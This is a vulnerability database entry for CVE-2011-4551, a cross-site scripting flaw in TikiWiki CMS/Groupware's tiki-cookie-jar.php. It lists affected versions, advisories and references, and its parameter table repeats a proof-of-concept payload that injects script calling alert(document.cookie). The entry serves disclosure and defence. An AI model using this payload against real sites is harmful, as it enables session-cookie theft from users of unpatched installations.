CVE-2011-4551

🗓️ 01 Oct 2012 00:00:00Reported by mitreType

cve🔗 web.nvd.nist.gov👁 274 Views🌐 WEB

XSS vulnerability in tiki-cookie-jar.php in TikiWiki CMS/Groupware before 8.2 and LTS before 6.5 allows remote attackers to inject arbitrary web script or HTML via arbitrary parameters.

Reporter	Title	Published	Views	Family All 10
Circl	CVE-2011-4551	20 Dec 201100:00	–	circl
Cvelist	CVE-2011-4551	1 Oct 201200:00	–	cvelist
EUVD	EUVD-2011-4477	7 Oct 202500:30	–	euvd
NVD	CVE-2011-4551	1 Oct 201200:55	–	nvd
OpenVAS	Tiki Wiki CMS Groupware 'show_errors' Parameter Stored XSS Vulnerability	21 Dec 201100:00	–	openvas
Packet Storm	Tiki Wiki CMS Groupware 8.1 / 6.4 LTS Cross Site Scripting	20 Dec 201100:00	–	packetstorm
Prion	Cross site scripting	1 Oct 201200:55	–	prion
RedhatCVE	CVE-2011-4551	22 May 202504:22	–	redhatcve
securityvulns	Tiki Wiki CMS Groupware Stored Cross-Site-Scripting	26 Dec 201100:00	–	securityvulns
securityvulns	Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)	26 Dec 201100:00	–	securityvulns

NVD

Node

tiki tikiwiki_cms/groupwareRange≤8.1

tiki tikiwiki_cms/groupwareMatch2.2

tiki tikiwiki_cms/groupwareMatch3.0

tiki tikiwiki_cms/groupwareMatch3.1

tiki tikiwiki_cms/groupwareMatch3.2

tiki tikiwiki_cms/groupwareMatch3.3

tiki tikiwiki_cms/groupwareMatch3.4

tiki tikiwiki_cms/groupwareMatch3.5

tiki tikiwiki_cms/groupwareMatch4

tiki tikiwiki_cms/groupwareMatch4.0

tiki tikiwiki_cms/groupwareMatch4.1

tiki tikiwiki_cms/groupwareMatch4.2

tiki tikiwiki_cms/groupwareMatch5.0

tiki tikiwiki_cms/groupwareMatch5.1

tiki tikiwiki_cms/groupwareMatch5.2

tiki tikiwiki_cms/groupwareMatch5.3

tiki tikiwiki_cms/groupwareMatch6.0

tiki tikiwiki_cms/groupwareMatch6.1

tiki tikiwiki_cms/groupwareMatch6.2

tiki tikiwiki_cms/groupwareMatch7.0

tiki tikiwiki_cms/groupwareMatch7.1

tiki tikiwiki_cms/groupwareMatch7.2

tiki tikiwiki_cms/groupwareMatch8.0

Node

tiki tikiwiki_cms/groupwareRange≤6.3-lts

Source	Link
info	www.info.tiki.org/article183-Tiki-Wiki-CMS-Groupware-8-2-and-6-5LTS-Security-Patches-Available
osvdb	www.osvdb.org/77966
secunia	www.secunia.com/advisories/47278
infoserve	www.infoserve.de/system/files/advisories/INFOSERVE-ADV2011-07.txt

Parameter	Position	Path	Description	CWE
show_errors	query param	/tiki-8.1/tiki-cookie-jar.php?show_errors=y&xss=</style></script><script>alert(document.cookie)</script>	Stored XSS via tiki-cookie-jar.php parameters	CWE-79
xss	query param	/tiki-8.1/tiki-cookie-jar.php?show_errors=y&xss=</style></script><script>alert(document.cookie)</script>	Stored XSS via tiki-cookie-jar.php parameters	CWE-79
show_errors	query param	/tiki-8.1/tiki-cookie-jar.php?show_errors=y&xss1=</style></script><script>alert(document.cookie)</script>	Stored XSS via tiki-cookie-jar.php parameters	CWE-79
xss1	query param	/tiki-8.1/tiki-cookie-jar.php?show_errors=y&xss1=</style></script><script>alert(document.cookie)</script>	Stored XSS via tiki-cookie-jar.php parameters	CWE-79
show_errors	query param	/tiki-8.1/tiki-cookie-jar.php?show_errors=y&xss2=</style></script><script>alert(document.cookie)</script>	Stored XSS via tiki-cookie-jar.php parameters	CWE-79
xss2	query param	/tiki-8.1/tiki-cookie-jar.php?show_errors=y&xss2=</style></script><script>alert(document.cookie)</script>	Stored XSS via tiki-cookie-jar.php parameters	CWE-79
show_errors	query param	/tiki-8.1/tiki-cookie-jar.php?show_errors=y&xss3=</style></script><script>alert(document.cookie)</script>	Stored XSS via tiki-cookie-jar.php parameters	CWE-79
xss3	query param	/tiki-8.1/tiki-cookie-jar.php?show_errors=y&xss3=</style></script><script>alert(document.cookie)</script>	Stored XSS via tiki-cookie-jar.php parameters	CWE-79

16 Jun 2026 23:35Current

5.9Medium risk

Vulners AI Score5.9

CVSS 24.3

EPSS0.01642

CWE-79